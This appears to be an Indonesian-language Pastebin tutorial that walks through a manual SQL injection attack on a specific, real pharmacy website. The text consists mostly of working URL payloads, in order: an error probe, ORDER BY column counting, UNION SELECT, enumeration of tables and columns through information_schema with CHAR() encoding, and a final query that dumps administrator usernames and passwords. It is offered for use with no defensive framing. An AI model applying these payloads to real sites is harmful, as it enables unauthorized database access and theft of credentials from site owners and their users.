Advertisement
Mr-Ts

SQLi Pake Jari

May 27th, 2015
248
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.46 KB | None | 0 0
  1. SQLi Pake Jari :::
  2.  
  3. :V
  4.  
  5. Target => http://www.superpharm.co.tt/test-detail.php?id=2
  6.  
  7. kasih tanya petik satu ==> http://www.superpharm.co.tt/test-detail.php?id='2 muncul error
  8.  
  9. sekarang cari kolum nya dengan menambahkan +order+by+1--+- jadinya seperti ini ==>
  10.  
  11. (tidak error) http://www.superpharm.co.tt/test-detail.php?id=2+order+by+1--+-
  12. (tidak error) http://www.superpharm.co.tt/test-detail.php?id=2+order+by+2--+-
  13. (tidak error) http://www.superpharm.co.tt/test-detail.php?id=2+order+by+3--+-
  14. (tidak error) http://www.superpharm.co.tt/test-detail.php?id=2+order+by+4--+-
  15. (Nah ini error) http://www.superpharm.co.tt/test-detail.php?id=2+order+by+5--+-
  16.  
  17. ini menunjukan kolom nya cuma ada 4
  18.  
  19. ok lanjut sekarang mencari angka injeksi caranya dengan memberi tanda - sebelum angka id jadinya begini karena tadi ditemukan kolumnya ada 4 maka jadinya kek bgini
  20.  
  21. http://www.superpharm.co.tt/test-detail.php?id=-2+union+select+1,2,3,4--+
  22.  
  23. nah nongol tuh angka injeksi
  24.  
  25. sekarang karena angka injeksi 2 maka cara nampilin data melalui sqlnya kek begini
  26.  
  27. http://www.superpharm.co.tt/test-detail.php?id=-2+union+select+1,group_concat%28table_name%29,3,4+from+information_schema.tables+where+table_schema=database%28%29--
  28.  
  29.  
  30. nah tampil tuh banyak data basenya tapi untuk menuju ke admin berbau username dan password biasanya di administrators pilih deh
  31.  
  32. caranya kek begini kaka masuk ke ==> http://www.branah.com/ascii-converter
  33.  
  34. lalu masukin administrators ==> add space == pilih yg desimal
  35.  
  36. administrators = 97 100 109 105 110 105 115 116 114 97 116 111 114 115
  37.  
  38. ok lanjut setelah itu
  39.  
  40. buat seperti ini di notepad CHAR(97, 100, 109, 105, 110, 105, 115, 116, 114, 97, 116, 111, 114, 115)
  41.  
  42.  
  43.  
  44. Rubah ==> database() ==> CHAR(97, 100, 109, 105, 110, 105, 115, 116, 114, 97, 116, 111, 114, 115)
  45. Rubah ==> group_concat(table_name) ==> group_concat(column_name)
  46. Rubah ==> information_schema.tables ==> information_schema.columns
  47. Rubah ==> table_schema ==> table_name
  48.  
  49. jadinya seperti ini
  50.  
  51. http://www.superpharm.co.tt/test-detail.php?id=-2+union+select+1,group_concat%28column_name%29,3,4+from+information_schema.columns+where+table_name=CHAR%2897,%20100,%20109,%20105,%20110,%20105,%20115,%20116,%20114,%2097,%20116,%20111,%20114,%20115%29--+
  52.  
  53.  
  54. ok setelah itu tinggal nampilin username sama passwordnya
  55.  
  56. http://www.superpharm.co.tt/test-detail.php?id=-2+union+select+1,group_concat%28user_name,0x3a,user_password%29,3,4+from+administrators
  57.  
  58.  
  59. Thanks To : Manusia Biasa Team | Unit_31
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement